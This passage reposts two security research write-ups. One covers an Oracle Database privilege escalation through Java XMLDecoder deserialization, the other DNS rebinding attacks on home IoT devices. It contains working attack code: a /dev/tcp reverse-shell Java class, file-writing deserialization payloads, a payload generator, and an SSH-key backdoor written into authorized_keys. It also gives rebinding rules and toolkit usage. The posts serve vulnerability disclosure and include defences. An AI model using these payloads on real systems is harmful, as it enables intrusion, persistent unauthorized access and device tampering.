Java deserialization vulnerabilities have been all the rage for the past few years. In 2015, Foxglove Security published an article detailing a critical security vulnerability in many J2EE application servers which left servers vulnerable to remote code execution. There have been a number of published exploits relying on Java deserialization since the 2015 Foxglove article, many based on the ysoserial library. There have also been a number of CVEs opened and patches issued to resolve these defects, including Oracle-specific CVEs such as CVE-2018-2628, CVE-2017-10271, and CVE-2015-4852.

The majority of the published exploits focus on application servers vulnerable to deserialization attacks. Today, however, I would like to explore Oracle Database and how it is vulnerable to a custom deserialization attack based on the tight integration of Java via Java Stored Procedures in Oracle Database. The examples in this post were created using Oracle 12c; however, earlier versions of Oracle Database are also vulnerable.

Java Stored Procedures

Oracle Enterprise Edition has a Java Virtual Machine embedded into the database, and Oracle Database supports native execution of Java via Java Stored Procedures:
create function get_java_property(prop in varchar2) return varchar2 is
language java name 'java.lang.System.getProperty(java.lang.String) return java.lang.String';
/

Basic JVM Protections

Of course, if you have some level of familiarity with Java and penetration testing, you may immediately leap to the notion of creating a reverse shell compiled within Oracle Database:

SET scan off
create or replace and compile java source named ReverseShell as
import java.io.*;
public class ReverseShell{
    public static void getConnection(String ip, String port) throws InterruptedException, IOException{
        Runtime r = Runtime.getRuntime();
        Process p = r.exec(new String[]{"/bin/bash","-c","0<&126-;exec 126<>/dev/tcp/" + ip + "/" + port + ";/bin/bash <&126 >&126 2>&126"});
        System.out.println(p.toString());
        p.waitFor();
    }
}
/
create or replace procedure reverse_shell (p_ip IN VARCHAR2, p_port IN VARCHAR2)
IS language java name 'ReverseShell.getConnection(java.lang.String, java.lang.String)';
/

This approach will not work, as the Oracle JVM implements fine-grained, policy-based security to control access to the OS and filesystem. Executing this procedure from a low-privileged account results in errors. Note that the error stack contains the missing permission and the command necessary to grant the access:

ORA-29532: Java call terminated by uncaught Java exception:
java.security.AccessControlException: the Permission (java.io.FilePermission /bin/bash execute) has not been granted to TESTER.
The PL/SQL to grant this is
dbms_java.grant_permission( 'TESTER', 'SYS:java.io.FilePermission','/bin/bash', 'execute' )

There have been previously reported methods to bypass the built-in Java permissions which will not be discussed in this post. Instead, I am going to demonstrate a new approach to bypassing these permissions via XML deserialization.
XML Deserialization

XML serialization and deserialization exist in Java to support cross-platform information exchange using a standardized industry format (in this case XML). To this end, the java.beans library contains two classes, XMLEncoder and XMLDecoder, which are used to serialize a Java object into an XML format and, at a later time, deserialize the object. Typical deserialization vulnerabilities rely on the existence of a service that accepts and deserializes arbitrary input. However, if you have access to a low-privileged Oracle account that can create objects in the user schema (i.e., a user with connect and resource), you can create your own vulnerable deserialization procedure.

As the "TESTER" user, I have created the following Java class "DecodeMe" and a Java Stored Procedure that invokes this class:

create or replace and compile java source named DecodeMe as
import java.io.*;
import java.beans.*;

public class DecodeMe{
    public static void input(String xml) throws InterruptedException, IOException {
        XMLDecoder decoder = new XMLDecoder(new ByteArrayInputStream(xml.getBytes()));
        Object object = decoder.readObject();
        System.out.println(object.toString());
        decoder.close();
    }
};
/
CREATE OR REPLACE PROCEDURE decodeme (p_xml IN VARCHAR2) IS
language java name 'DecodeMe.input(java.lang.String)';
/

The decodeme procedure will accept an arbitrary string of XML-encoded Java and execute the provided instructions. Information on the proper format for the serialized XML can be found here. This block will simply call println to output data to the terminal:
BEGIN
  decodeme('<?xml version="1.0" encoding="UTF-8" ?>
    <java version="1.4.0" class="java.beans.XMLDecoder">
      <object class="java.lang.System" field="out">
        <void method="println">
          <string>This is test output to the console</string>
        </void>
      </object>
    </java>');
END;
/

The Vulnerability

Of course, we don't need a deserialization process to print output to the console, so how exactly is this process vulnerable? It turns out that the deserialization process bypasses JVM permission settings and allows a user to arbitrarily write to files on the OS. See the following example script:

BEGIN
  decodeme('
    <java class="java.beans.XMLDecoder" version="1.4.0" >
      <object class="java.io.FileWriter">
        <string>/tmp/PleaseDoNotWork.txt</string>
        <boolean>True</boolean>
        <void method="write">
          <string>Why for the love of god?</string>
        </void>
        <void method="close" />
      </object>
    </java>');
END;
/

Executing this anonymous block creates a file named "PleaseDoNotWork.txt" in the /tmp folder. Therefore, via deserialization, we can write arbitrary files to the file system, bypassing the built-in security restrictions.

Exploitation

As it turns out, we can not only write new files to the system, we can also overwrite or append to any file on which the Oracle user has write permissions. Clearly this has severe ramifications for the database, as an attacker could overwrite critical files - including control files - which could result in a successful denial-of-service attack or data corruption. However, with a carefully crafted payload, we can use this deserialization attack to gain access to the server as the Oracle user. Assuming SSH is open on the server and configured to accept RSA connections, the following payload will append an RSA key to the authorized_keys file of the Oracle account that manages the database processes:
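For experimentation, the FileWriter payload shown above can be generated programmatically. Below is a small Python helper (my own illustration, not part of the original exploit) that builds the same java.io.FileWriter XMLDecoder payload for an arbitrary path and content:

```python
# Illustrative helper: build the XMLDecoder FileWriter payload shown above
# for an arbitrary target path and file content. Note that a real payload
# would need XML escaping if path/content contain characters like '<' or '&'.

def filewriter_payload(path: str, content: str) -> str:
    return (
        '<java class="java.beans.XMLDecoder" version="1.4.0">\n'
        '  <object class="java.io.FileWriter">\n'
        f'    <string>{path}</string>\n'
        '    <boolean>True</boolean>\n'
        '    <void method="write">\n'
        f'      <string>{content}</string>\n'
        '    </void>\n'
        '    <void method="close" />\n'
        '  </object>\n'
        '</java>'
    )

payload = filewriter_payload("/tmp/PleaseDoNotWork.txt", "Why for the love of god?")
print(payload)
```

The resulting string would be passed to the vulnerable decodeme procedure inside a PL/SQL block, exactly as in the examples above.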
BEGIN
  decodeme('
    <java class="java.beans.XMLDecoder" version="1.4.0">
      <object class="java.io.FileWriter">
        <string>/home/oracle/.ssh/authorized_keys</string>
        <boolean>True</boolean>
        <void method="write">
          <string>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCedKQPeoJ1UeJEW6ZVkiuWAxBKW8F4fc0VrWxR5HEgaAcVodhgc6X7klyOWrJceGqICcCZd6K+/lvI3xaE2scJpRZWlcJQNCoZMRfmlhibq9IWMH0dm5LqL3QMqrXzZ+a2dfNohSdSmLDTaFHkzOGKEQIwHCv/e4e/eKnm0fUWHeL0k4KuCn3MQUN1HwoqoCciR0DrBDOYAKHxqpBv9rDneCdvaS+tqlr5eShjNlHv1YzJGb0lZZlsny19is8CkhcZ6+O+UCKoBPrxaGsfipsEIH5aPu9xVA90Xgsakhg4yoy9FLnES+xmnVxKX5GHyixi3qeWGDwBsAvhAAGLxOc5</string>
        </void>
        <void method="close" />
      </object>
    </java>');
END;
/

When executed, the code will append an arbitrary RSA key to the Oracle user's authorized_keys file, granting an attacker SSH access as the Oracle user. The Oracle user can access the database as SYS, and the attacker has effectively compromised the entire database.

Impact

As Oracle Database has a high per-instance cost, many production architectures rely on a shared-tenant model, where multiple mission-critical applications leverage the same database and application support users share access to the same system. Furthermore, Oracle Exadata implementations often host multiple database instances on the same servers. If a low-privileged user, perhaps a tier-III support admin for a specific application, were to deploy this exploit, they could effectively gain access to the data and applications supporting an entire enterprise.

Conclusion

As we can see, the deserialization design pattern implemented in Java continues to create a myriad of vulnerabilities. Security analysts should look beyond J2EE-based deserialization attacks and consider attack vectors based on other embedded implementations.

Reporting Timeline

This issue was first reported to Oracle Support in January 2018 and was addressed in the July 2018 CPU released on July 17th, 2018.
Update: Navigating the intricacies of Oracle patches can be quite the challenge. The Oracle bug for this vulnerability is Bug 27923353, and the patch is for the OJVM system. For this POC, the proper patch is OJVM release update 12.2.0.1.180717 (p27923353_122010_Linux-x86-64.zip).

Sursa: http://obtruse.syfrtext.com/2018/07/oracle-privilege-escalation-via.html
  4. Attacking Private Networks from the Internet with DNS Rebinding

TL;DR: Following the wrong link could allow remote attackers to control your WiFi router, Google Home, Roku, Sonos speakers, home thermostats, and more.

The home WiFi network is a sacred place; your own local neighborhood of cyberspace. There we connect our phones, laptops, and “smart” devices to each other and to the Internet, and in turn we improve our lives, or so we are told. By the late twenty-teens, our local networks have become populated by a growing number of devices. From smart TVs and media players to home assistants, security cameras, refrigerators, door locks, and thermostats, our home networks are a haven for trusted personal and domestic devices.

Many of these devices offer limited or non-existent authentication to access and control their services. They inherently trust other machines on the network in the same way that you would inherently trust someone you’ve allowed into your home. They use protocols like Universal Plug and Play (UPnP) and HTTP to communicate freely between one another, but are inherently protected from inbound connections from the Internet by means of their router’s firewall. They operate in a sort of walled garden, safe from external threat. Or so their developers probably thought.

A few months ago, I began to follow a winding path of research into a 10-year-old network attack called DNS rebinding. Put simply, DNS rebinding allows a remote attacker to bypass a victim’s network firewall and use their web browser as a proxy to communicate directly with devices on their private home network. By following the wrong link, or being served a malicious banner advertisement, you could inadvertently provide an attacker with access to the thermostat that controls the temperature in your home.

NOTE: This research has been simultaneously released with a counterpart WIRED article on the subject by Lily Hay Newman.

What is DNS Rebinding?
To better understand how DNS rebinding works, it’s helpful to first understand the security mechanism that it evades: the web browser’s same-origin policy. Many moons ago, browser vendors decided it probably wouldn’t be a good idea for web pages served from one domain to be able to make arbitrary requests to another domain without explicit permission from that second domain. If you follow a malicious link on the web, the web page you arrive at shouldn’t be able to make an HTTP request to your bank’s website and leverage your logged-in session there to empty your account. Browsers restrict this behavior by limiting HTTP requests originating from a domain to access only other resources that are also located on that domain (or another domain that explicitly enables cross-origin resource sharing).

DNS can be abused to trick web browsers into communicating with servers they don’t intend to.

The code at http://malicious.website can’t make a standard XMLHttpRequest to http://bank.com/transfer-fund because malicious.website and bank.com are different domains, and therefore the browser treats them as separate origins. Browsers enforce this by requiring that the protocol, domain name, and port number of a URL being requested are identical to those of the URL of the page requesting it. Sounds good, right? Not so fast.

Behind every domain name lies an IP address. malicious.website may reside at 34.192.228.43 and bank.com may call 171.159.228.150 home. The Domain Name System (DNS) provides a useful mechanism of translating easy-to-remember domain names into the IP addresses that our computers actually use to talk to each other. The catch is that modern browsers use URLs to evaluate same-origin policy restrictions, not IP addresses. What would happen if the IP address of malicious.website were to quickly change from 34.192.228.43 to 171.159.228.150? According to the browser, nothing would have changed.
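As a rough sketch (my own illustration; real browser origin rules have additional nuances like `document.domain` and CORS), the same-origin check amounts to comparing a (scheme, host, port) triple:

```python
from urllib.parse import urlsplit

def origin(url: str) -> tuple:
    """Return the (scheme, host, port) triple browsers compare for same-origin checks."""
    parts = urlsplit(url)
    default_ports = {"http": 80, "https": 443}
    port = parts.port or default_ports.get(parts.scheme)
    return (parts.scheme, parts.hostname, port)

def same_origin(a: str, b: str) -> bool:
    """Two URLs share an origin only if scheme, host, and port all match."""
    return origin(a) == origin(b)

# Explicit port 80 is the http default, so these are the same origin:
print(same_origin("http://bank.com/transfer-fund", "http://bank.com:80/login"))      # True
# Different hosts are different origins, regardless of what IPs back them:
print(same_origin("http://malicious.website/x", "http://bank.com/transfer-fund"))    # False
```

The key weakness the rest of this post exploits: the check compares names, never the IP addresses behind them.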
But now, instead of communicating with the server that originally hosted the website files at malicious.website, your browser would actually be talking to bank.com. See the problem? DNS can be abused to trick web browsers into communicating with servers they don’t intend to.

DNS rebinding has received a few brief moments of attention over the past year when vulnerabilities were found in a few popular pieces of software. Most notably, Blizzard’s video games, the Transmission torrent client, and several Ethereum cryptocurrency wallets were vulnerable to DNS rebinding attacks until recently. In just the wrong circumstance, the Ethereum Geth vulnerability could have given a remote attacker full control of the victim’s Ethereum account, and with it, all of their coin. DNS rebinding allows a remote attacker to bypass a victim’s network firewall and use their web browser as a proxy to communicate directly with devices on their private home network.

How DNS Rebinding Works

An attacker controls a malicious DNS server that answers queries for a domain, say rebind.network. The attacker tricks a user into loading http://rebind.network in their browser. There are many ways they could do this, from phishing to persistent XSS or by buying an HTML banner ad.

Once the victim follows the link, their web browser makes a DNS request looking for the IP address of rebind.network. When it receives the victim’s DNS request, the attacker-controlled DNS server responds with rebind.network’s real IP address, 34.192.228.43. It also sets the TTL value on the response to be 1 second so that the victim’s machine won’t cache it for long.

The victim loads the web page from http://rebind.network, which contains malicious JavaScript code that begins executing on the victim’s web browser. The page begins repeatedly making some strange-looking POST requests to http://rebind.network/thermostat with a JSON payload like {“tmode”: 1, “a_heat”: 95}.
At first, these requests are sent to the attacker’s web server running on 34.192.228.43, but after a while (browser DNS caching is weird) the browser’s resolver observes that the DNS entry for rebind.network is stale, and so it makes another DNS lookup.

The attacker’s malicious DNS server receives the victim’s second DNS request, but this time it responds with the IP address 192.168.1.77, which happens to be the IP address of a smart thermostat on the victim’s local network. The victim’s machine receives this malicious DNS response and begins to point HTTP requests intended for http://rebind.network at 192.168.1.77. As far as the browser is concerned, nothing has changed, and so it sends another POST to http://rebind.network/thermostat. This time, that POST request gets sent to the small unprotected web server running on the victim’s WiFi-connected thermostat. The thermostat processes the request, and the temperature in the victim’s home is set to 95 degrees.

This scenario is an actual exploit (CVE-2018-11315) that I’ve found and used against my Radio Thermostat CT50 “smart” thermostat. The implications and impact of an attack like this can have far-reaching and devastating effects on devices or services running on a private network. By using a victim’s web browser as a sort of HTTP proxy, DNS rebinding attacks can bypass network firewalls and make every device on your protected intranet available to a remote attacker on the Internet.

What’s Vulnerable?

After finding and exploiting this vulnerability in the very first device that I poked around with, I feared that there were likely many other IoT devices that could also be targeted. I began to collect and borrow some of the more popular smart home devices on the market today. Over the next few weeks, every device that I got my hands on fell victim to DNS rebinding in one way or another, leading to information being leaked, or in some cases, full device control.
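The DNS side of the attack described above boils down to a tiny piece of per-client state on the attacker's server. Here is a minimal Python sketch of that response policy (illustrative only; a real server would speak the actual DNS wire protocol, and the IP addresses below are the examples from the walkthrough):

```python
# Sketch of the attacker's DNS response policy for rebind.network.
ATTACKER_IP = "34.192.228.43"   # where the malicious page is actually hosted
TARGET_IP = "192.168.1.77"      # the victim's thermostat on the LAN

class RebindPolicy:
    def __init__(self):
        self.seen = {}  # client address -> number of queries answered so far

    def answer(self, client: str) -> tuple:
        """Return the (ip, ttl) pair to serve for a query from `client`."""
        count = self.seen.get(client, 0)
        self.seen[client] = count + 1
        if count == 0:
            # First lookup: serve the real page, but with a 1-second TTL so
            # the browser's resolver asks again almost immediately.
            return (ATTACKER_IP, 1)
        # Every later lookup: rebind the name to the LAN target.
        return (TARGET_IP, 1)

policy = RebindPolicy()
print(policy.answer("victim"))  # ('34.192.228.43', 1)
print(policy.answer("victim"))  # ('192.168.1.77', 1)
```

After the second answer, the browser still believes it is talking to rebind.network, so the same-origin policy never objects.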
Google Home, Chromecast, Roku, Sonos WiFi speakers, and certain smart thermostats could all be interfaced with in some way by an unauthorized remote attacker. Seems like a big problem, huh?

The idea that the local network is a safe haven is a fallacy. If we continue to believe it, people are going to get hurt.

I’ve been in contact with the vendors of these products, and all of them are working on or have already released security patches (more on that disclosure in this essay). Those are just the companies whose devices I’ve personally tested in my spare time. If companies with such high profiles are failing to prevent against DNS rebinding attacks, there must be countless other vendors that are as well.

Proof-of-concept DNS rebinding attack @ http://rebind.network

I’ve authored a proof-of-concept exploit that you can use to target these devices on your home network today. That demo is live at http://rebind.network.

Google Home

Google Home Mini

The apps used to control Google Home products make use of an undocumented REST API running on port 8008 of these devices (e.g. http://192.168.1.208:8008). The first mention of this service that I’ve been able to find surfaced back in 2013, when Brandon Fiquett wrote about a local API he found while sniffing the WiFi traffic to his Chromecast. Fast forward five years, and it seems that Google has integrated that same mysterious API into all of its Google Home products, and as you can imagine, that undocumented API is fairly well documented by amateurs and hobbyists at this point. In fact, earlier this year Rithvik Vibhu published detailed API docs to the public. This API provides extensive device control without any form of authentication. Some of the most interesting features include the ability to launch entertainment apps and play content, scan and join nearby WiFi networks, reboot, and even factory reset the device. Imagine a scenario where you’re browsing the web and all of a sudden your Google Home factory resets.
What if your roommate left their web browser open on their laptop and an HTML advertisement sent your Chromecast into reboot loops while you were trying to watch a movie? One of my favorite attack scenarios targeting this API is an abuse of the WiFi scanning capability. Attackers could pair this information with publicly accessible wardriving data and get accurate geolocation using only your list of nearby WiFi networks. This attack would be successful even if you’ve disabled your web browser’s geolocation API and are using a VPN to tunnel your traffic through another country. Here is an example of some of the data that I’ve exfiltrated from my own Chromecast. Can you figure out where I might be writing this post from?

UPDATE (06/19/2018): Craig Young's simultaneous and independent research on this vulnerability was disclosed yesterday, just ahead of this post. He actually created a PoC for the geolocation attack scenario that I described above but never implemented! His work, and Brian Krebs's commentary on it, are both excellent. I notified Google about this vulnerability when I discovered it in March, and again in April after receiving no response. According to Krebs's post, Young reported the bug to Google in May and his ticket was closed with "Status: Won’t Fix (Intended Behavior)." It wasn't until Krebs himself contacted Google that they agreed to patch the vulnerability. Google is expected to release a patch in mid-July 2018.

Sonos WiFi Speakers

Sonos Play:1

Like Google Home, Sonos WiFi speakers can also be controlled by a remote attacker (CVE-2018-11316). By following the wrong link, you could find your pleasant evening jazz playlist interrupted by content of a very different sort. That’s fun for simple pranks, but ultimately pretty harmless, right? After a bit of digging, I found a few other interesting links to be followed on the Sonos UPnP web server that might not be so innocent.
It appears that several hidden web pages are accessible on the device for debugging purposes. http://192.168.1.76:1400/support/review serves an XML file that appears to contain the output of several Unix commands run on the Sonos device (which itself seems to run a distribution of Linux). http://192.168.1.76:1400/tools provides a bare-bones HTML form that lets you run a few of these Unix commands on the Sonos device yourself! The Sonos HTTP API allows a remote attacker to map internal and external networks using the traceroute command and probe hosts with ICMP requests using ping, via simple POST requests. An attacker could use a Sonos device as a pivot point to gather useful network topology and connectivity information to be used in a follow-up attack.

UPDATE (06/19/2018): Sonos has published a statement along with this public release: "Upon learning about the DNS Rebinding Attack, we immediately began work on a fix that will roll out in a July software update."

Roku

RokuTV

While exploring the network in the lounge at my work building, I found an HTTP server running on port 8060 of a RokuTV. I soon found that Roku’s External Control API provides control over basic functionality of the device, like launching apps, searching, and playing content. Interestingly, it also allows direct control over button and key presses like a virtual remote, as well as input for several sensors including an accelerometer, orientation sensor, gyroscope, and even a magnetometer (why?). As you’ve probably guessed, this local API requires no authentication and can be exploited via DNS rebinding (CVE-2018-11314). I reported these findings to the Roku security team, who initially responded saying:

There is no security risk to our customers’ accounts or the Roku platform with the use of this API… We are aware of web apps like http://remoku.tv that can be loaded into a browser and used to interact with the Roku on the same local network.
After describing a detailed attack scenario, a security VP at the company clarified that their team does “consider this a valid threat and it is not mundane in the least.” To the team’s credit, they immediately halted the release rollout of Roku OS 8.1 and began to develop a patch, which they expected could take as long as 3-4 months if they couldn’t find a solution that worked in time for their upcoming release. After some consideration, I informed the team that I was working with a reporter at WIRED and that we were likely going to publish the research quickly. The next morning I received an email from the team that a patch had been developed and was already in the process of being pushed to over 20 million devices through a firmware update!

UPDATE (06/19/2018): Roku has released a statement along with this public release: “After recently becoming aware of the DNS Rebinding issue, we created a software patch which is now rolling out to customers. Note that any potential exploitation of this vulnerability poses no security risk to our customers’ accounts, our channel partners’ content security or the Roku platform.”

Radio Thermostat

Radio Thermostat CT50

The Radio Thermostat CT50 & CT80 devices have by far the most consequential IoT device vulnerabilities I’ve found so far. These devices are some of the cheapest “smart” thermostats available on the market today. I purchased one to play with after being tipped off to their lack of security by CVE-2013-4860, which reported that the device had no form of authentication and could be controlled by anyone on the network. Daniel Crowley of Trustwave SpiderLabs had attempted to contact the vendor several times before ultimately publishing the vulnerability after hearing no response from the company. Unfortunately, this lack of response is a recurring theme of vulnerability disclosure over the years, especially with smaller manufacturers.
I expected that the chances that the vulnerability had gone unpatched for five years were actually high, so I purchased a brand new CT50. That assumption turned out to be correct, and the thermostat’s control API left the door wide open for DNS rebinding shenanigans. It’s probably pretty obvious the kind of damage that can be done if your building’s thermostat can be controlled by remote attackers. The PoC at http://rebind.network exfiltrates some basic information from the thermostat before setting the target temperature to 95°F. That temperature can be dangerous, or even deadly in the summer months, to an elderly or disabled occupant. Not to mention that if your device is targeted while you’re on vacation, you could return home to a whopper of a utility bill. The severity of this vulnerability, and the continued negligence by the Radio Thermostat Company of America, who’ve had years to fix it, are perfect examples of why we need security regulation for IoT devices.

WiFi Routers

If you’ve been following all of this so far, you may have already started to think of other devices on home networks that could be targeted. Would it surprise you to learn that, historically, network routers themselves are some of the most common targets of DNS rebinding attacks? Probably not. That’s because network routers hold the keys to the kingdom. Own the router and you own the network.

There are two common attack vectors that I’ve seen with DNS rebinding:

POSTing default credentials to a login page like http://192.168.1.1/login to own the router admin panel. Once the attacker has authenticated, they have full device control and can configure the network as they please.

Using a router’s Internet Gateway Device (IGD) interface through UPnP to configure permanent port-forwarding connections and expose arbitrary UDP & TCP ports on the network to the public Internet.

The first is pretty basic. Many routers ship with default login credentials and consumers never change them.
Sure, maybe they will enable WPA2 and set a WiFi password, but I bet many of them don’t realize their router’s configuration panel is still accessible to anyone on the network using “admin:admin”. The second attack is even worse, a downright travesty. Somehow, in this day and age, most brand-spanking-new home routers still ship with UPnP servers enabled by default. These UPnP servers provide admin-like control over router configuration to any unauthenticated machine on the network over HTTP. Any machine on the network, or the public Internet through DNS rebinding, can use IGD/UPnP to configure a router’s DNS server, add & remove NAT and WAN port mappings, view the # of bytes sent/received on the network, and access the router’s public IP address (check out upnp-hacks.org for more info). A DNS rebinding attack that targets a router’s UPnP server can punch a hole in the victim’s firewall, leaving a permanent entry point to execute raw TCP & UDP attacks against devices on the network without being bound to the normal HTTP-only limitations of DNS rebinding attacks. They can even configure port forwarding rules that forward traffic to external IP addresses on the Internet, allowing an attacker to add a victim’s router as a node in a large network of infected routers that can be used to mask their traffic from authorities (see Akamai’s recent UPnProxy research). IGD also provides an interface to discover a router’s public IP address through a simple unauthenticated HTTP request. This functionality, combined with DNS rebinding, can be used to de-anonymize users who are otherwise attempting to mask their public IP address through a VPN or by using TOR. In my experience router vulnerability to DNS rebinding is a mixed bag. I’ve seen routers that completely block DNS rebinding attacks, routers that randomize their UPnP server port to make discovery and attack more difficult, and I’ve seen routers that are completely wide-open to the attack. 
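To make the IGD abuse concrete, the SOAP request a client sends a router to punch a hole in the firewall looks roughly like the sketch below. The action and argument names come from the standard UPnP WANIPConnection service description; the control URL, router address, and the IPs/ports used here are placeholder assumptions (a real client would discover them via SSDP), and in the attack described above the victim's browser would be the one sending this body:

```python
# Sketch: build the SOAP body for the UPnP IGD "AddPortMapping" action,
# which asks the router to forward an external port to a LAN host.
SERVICE = "urn:schemas-upnp-org:service:WANIPConnection:1"

def add_port_mapping_body(ext_port: int, int_port: int, int_client: str,
                          proto: str = "TCP", desc: str = "demo") -> str:
    return f"""<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
            s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:AddPortMapping xmlns:u="{SERVICE}">
      <NewRemoteHost></NewRemoteHost>
      <NewExternalPort>{ext_port}</NewExternalPort>
      <NewProtocol>{proto}</NewProtocol>
      <NewInternalPort>{int_port}</NewInternalPort>
      <NewInternalClient>{int_client}</NewInternalClient>
      <NewEnabled>1</NewEnabled>
      <NewPortMappingDescription>{desc}</NewPortMappingDescription>
      <NewLeaseDuration>0</NewLeaseDuration>
    </u:AddPortMapping>
  </s:Body>
</s:Envelope>"""

# Example: expose SSH on a LAN host (192.168.1.77:22) as external port 8888.
body = add_port_mapping_body(8888, 22, "192.168.1.77")
print("AddPortMapping" in body)
```

Note that the router accepts this with no authentication at all, which is exactly why a rebound browser request is enough.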
I should mention, though, that I’ve largely stayed away from applying my DNS rebinding research to routers so far... mostly because I’m almost too afraid to look.

The Walled Garden Is a Lie

How is it that so many devices today could be vulnerable to an attack that was introduced over ten years ago? There are likely more reasons for this than I can explain, but I’m willing to bet money on two of them. The first is awareness. Best I can tell, DNS rebinding isn’t as popular of an attack as it should be. Sure, security nerds may have heard of it, but I’d wager that very few of them have actually ever tried it. It’s historically been a sort of cumbersome and difficult-to-pull-off attack in practice. You have to spin up a malicious DNS server in the cloud, write some custom JavaScript payload targeting a specific service, serve that to a victim on a target network, and then figure out how to use their web browser to pivot to a target machine running that service, which you probably don’t know the IP address of. There’s overhead and it’s error-prone. (I’ve written some tooling to ease some of that pain. More below…)

We need developers to write software that treats local private networks as if they were hostile public networks.

Even if DNS rebinding becomes more popular in cybersecurity communities, that isn’t a guarantee that we’ll see a large drop in the number of vulnerable devices. That’s because security nerds aren’t the ones implementing these APIs; web developers are. Sure, web developers should know that externally facing API endpoints need authorization of some kind, but there is a recurring general consensus that private networks themselves can be used to secure intranet-facing APIs. Local APIs consistently offload trust and security to the private network itself. Why would your local REST API need authorization if your router has it? Entire protocols like UPnP are built around the idea that devices on the same network can trust each other.
This is the root of the problem. We need developers to write software that treats local private networks as if they were hostile public networks. The idea that the local network is a safe haven is a fallacy. If we continue to believe it, people are going to get hurt.

Protecting Against DNS Rebinding

Consumers

As the user of a product or service, you are often at the mercy of the people who built it. Fortunately, in the case of DNS rebinding, you have some control over protecting your network so long as you can make changes to your router’s configuration. OpenDNS Home is a free DNS service that can be configured to filter suspicious IP addresses, like private IP ranges, out of DNS responses. You should be able to change the DNS server your router uses from your ISP’s default to one of OpenDNS Home’s DNS servers in your router settings. If you’d prefer to control this filtering on your router itself instead of trusting a public DNS server like OpenDNS to do it, you can use Dnsmasq or opt to install libre router firmware like DD-WRT on the router itself. Either of these solutions is adequate if you have control over your router, but watch out, because you may still be a target of DNS rebinding attacks whenever you are on a network that hasn’t been explicitly configured to protect against them.

Developers

If you’re a developer, or are involved in creating a product that has an HTTP API, there are several things you can do to protect it from DNS rebinding attacks. There are three simple solutions to choose from. The first, and simplest to implement without side effects to your existing system, is to add “Host” header validation to your HTTP server. This header is included in all HTTP requests sent from a modern browser, and it contains the host (hostname:port) of the server it is expecting to communicate with.
This value can be a domain name or an IP address, but either way, the server that receives the request should validate that its own host matches the host being requested. Because DNS rebinding relies on the change of an underlying IP address associated with a domain name, the Host header included in a malicious HTTP request that’s been rebound to a target service will maintain the original domain name as its Host header value. A malicious POST request to your router’s login page will have a Host header value that doesn’t match your router’s hostname or IP address on the network. It would instead look like Host: malicious.website. Web servers should validate that the requested Host header matches their expected value exactly and respond with a 403 Forbidden HTTP status code if it doesn’t. I’ve written an NPM module that does this for Express.js web servers, but it should be pretty easy to implement in any web server or language. Another effective method of spoiling DNS rebinding attacks is to use HTTPS instead of HTTP, even for local network connections. When rebinding occurs, the service being targeted will have an SSL certificate that isn’t valid for malicious.website, and so a security warning will block the request from reaching your API endpoint. This solution has the added bonus of providing extra privacy and security for your users in general, with the usual benefits that come with TLS/SSL. Vendors have historically shied away from shipping IoT devices with their own TLS/SSL certificates, but the Plex media server software has tackled this problem in an interesting way by actually using DNS rebinding to issue certificates and protect their customers! Probably the best solution, albeit the one that involves the most potential disruption to your existing service, is to add some form of user authentication to your API. If your API controls real-world functionality or provides access to sensitive information, it should be accessible to select parties only. Period.
It should not be accessible to the entire private network, and therefore the public Internet as well through DNS rebinding. There is absolutely no reason that any device on the WiFi network should be able to arbitrarily control the heat in a building. People forget how easy it is to crack WPA2 WiFi. Tooling & Details To help spread awareness of DNS rebinding attacks I’ve built tooling and libraries that others can use to author their own DNS rebinding attacks. Aside from the JavaScript payload written to target a specific device or service, the process of delivering that payload, interacting with the malicious DNS server, and enumerating hosts on the victim’s private network is pretty much the same between different attack targets. To lower the barrier to entry to learn about and perform DNS rebinding attacks, I’ve open sourced: A “malicious” DNS server called whonow A front-end JavaScript library called DNS Rebind Toolkit Whonow DNS Server Whonow is a custom DNS server that lets you specify DNS responses and rebind rules dynamically using domain requests themselves. Here’s an example of how it works:

# respond to DNS queries for this domain with 34.192.228.43 the first
# time it is requested and then 192.168.1.1 every time after that.
A.34.192.228.43.1time.192.168.1.1.forever.rebind.network

# respond first with 34.192.228.43, then 192.168.1.1 the next five
# times, and then start all over again (1, then 5, forever…)
A.34.192.228.43.1time.192.168.1.1.5times.repeat.rebind.network

What’s great about dynamic DNS rebinding rules is that you don’t have to spin up your own malicious DNS server to start exploiting the browser’s same-origin policy. Instead, everyone can share the same public whonow server running on port 53 of rebind.network. You can try it now if you’d like; just use dig to query the public whonow instance. It responds to requests for *.rebind.network domain names.
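The rule encoding above can be illustrated with a toy parser. This is only a sketch of the format as shown in the two examples, not whonow's actual implementation:

```javascript
// Toy parser for whonow-style rule domains: a record type, then one or
// more (IPv4 address, repetition) pairs, optionally ending in "repeat".
function parseRebindDomain(domain) {
  const parts = domain
    .replace(/^A\./, "")               // strip the record type
    .replace(/\.rebind\.network$/, "") // strip the base domain
    .split(".");
  const rules = [];
  for (let i = 0; i < parts.length; ) {
    if (parts[i] === "repeat") {
      rules.push({ repeat: true });
      i += 1;
      continue;
    }
    rules.push({
      ip: parts.slice(i, i + 4).join("."), // four dotted octets
      count: parts[i + 4],                 // "1time", "5times", "forever"...
    });
    i += 5;
  }
  return rules;
}
```

For the first example domain this yields one rule serving 34.192.228.43 a single time, followed by one serving 192.168.1.1 forever.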
# dig is a unix command for making DNS requests
dig A.10.10.10.50.forever.rebind.network

;; QUESTION SECTION:
;10.10.10.50.forever.rebind.network. IN A

;; ANSWER SECTION:
10.10.10.50.forever.rebind.network. 1 IN A 10.10.10.50

Whonow always sets TTL values to one second, so you can expect that its responses won’t stay in a DNS resolver’s cache for long. Whonow public server output DNS Rebind Toolkit DNS Rebind Toolkit is a utility library that automates the process of executing DNS rebinding attacks. Once you’ve written a JavaScript payload to target a specific service, DNS Rebind Toolkit can help you deploy that attack on a victim’s network. It uses a WebRTC IP address leak to discover the victim’s local IP address. It automates network subnet enumeration so that you can target devices even if you don’t know their IP addresses on the private network. It automates the DNS rebinding portion of the attack. You get a Promise that resolves once the rebind has finished. It uses whonow behind the scenes so that you don’t have to worry about the DNS server component of a DNS rebinding attack. It comes with several payloads for attacking common IoT devices and well-documented examples so that you can learn to write your own exploits. Launching an attack against a Google Home device on a 192.168.1.1/24 subnet is as easy as embedding a code snippet in an index.html page. That index.html file will launch the attack, spawning one iframe for each IP address in the array passed to rebind.attack(…). Each iframe embeds payloads/google-home.html with the following JavaScript snippet: Links & Thanks Thanks to Lily Hay 